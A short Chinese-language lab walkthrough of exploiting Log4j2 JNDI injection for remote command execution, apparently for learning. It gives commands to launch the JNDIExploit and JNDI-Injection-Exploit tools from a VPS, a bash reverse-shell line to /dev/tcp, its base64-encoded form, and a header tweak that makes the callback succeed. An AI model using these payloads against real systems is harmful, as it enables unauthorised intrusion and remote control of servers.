某靶场Log4j2远程命令执行
最近一直在跟众多师傅们一起打某个靶场玩,发现还是有点意思的。所以特意呢打算更新几个这样的文章来供大家看看。
废话不多说我们直接开始吧。
所用到的工具:JNDIExploit-1.3-SNAPSHOT.jar
某靶场
长这样
vps中启动工具
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 35532 -i 0.0.0.0
直接构造payload,获得flag(JNDIExploit-1.3-SNAPSHOT.jar工具poc 以/TomcatBypass/TomcatEcho结尾)
第二个 稍微有点复杂 触发点不一样
先抓包
vps启动工具
bash -i >& /dev/tcp/ip/1234 0>&1 命令需要在https://www.jackson-t.ca/runtime-exec-payloads.html进行编码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}” -A IP
vps开启监听
burp构造payload
发现服务器监听无信息返回,添加Content-Type头
Content-Type:application/x-www-form-urlencoded
添加后
成功反弹
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考
我不会渗透,我们下次再见。